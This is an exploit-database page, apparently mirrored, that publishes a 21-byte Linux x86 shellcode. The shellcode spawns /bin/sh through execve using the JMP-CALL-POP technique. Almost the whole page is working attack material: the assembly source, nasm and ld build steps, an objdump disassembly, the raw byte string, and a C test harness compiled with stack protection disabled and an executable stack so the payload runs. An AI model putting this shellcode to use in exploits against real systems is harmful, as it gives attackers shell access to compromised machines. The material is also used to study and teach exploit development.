Registerlinuxx86 execve(binsh) using jmpcallpop shellcode (21 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & linux_x86 vulnerability
Online Vulnerability Scanner Tools
Code...
/* ;Category: Shellcode ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21 bytes) ;Author: Kirill Nikolaev ;Date: 01/07/2019 ;Architecture: Linux x86 =========== Asm Source =========== global _start section .text _start: jmp short call_shellcode shellcode: pop ebx xor eax,eax mov al, 11 int 0x80 call_shellcode: call shellcode message db "/bin/sh" ================================ Instruction for nasm compliation ================================ nasm -f elf32 shellcode.asm -o shellcode.o ld -z execstack shellcode.o -o shellcode =================== objdump disassembly =================== Disassembly of section .text: 08048080 <_start>: 8048080: eb 07 jmp 8048089 <call_shellcode> 08048082 <shellcode>: 8048082: 5b pop %ebx 8048083: 31 c0 xor %eax,%eax 8048085: b0 0b mov $0xb,%al 8048087: cd 80 int $0x80 08048089 <call_shellcode>: 8048089: e8 f4 ff ff ff call 8048082 <shellcode> 0804808e <message>: 804808e: 2f das 804808f: 62 69 6e bound %ebp,0x6e(%ecx) 8048092: 2f das 8048093: 73 68 jae 80480fd <message+0x6f> ================== 21 Bytes Shellcode ================== \xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\xe8\xf4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 ====================== C Compilation And Test ====================== gcc -fno-stack-protector -z execstack shellcode.c -o shellcode /* #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\xe8\xf4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
Linuxx86 execve(binsh) using jmpcallpop shellcode (21 bytes) Vulnerability / Exploit Source : Linuxx86 execve(binsh) using jmpcallpop shellcode (21 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes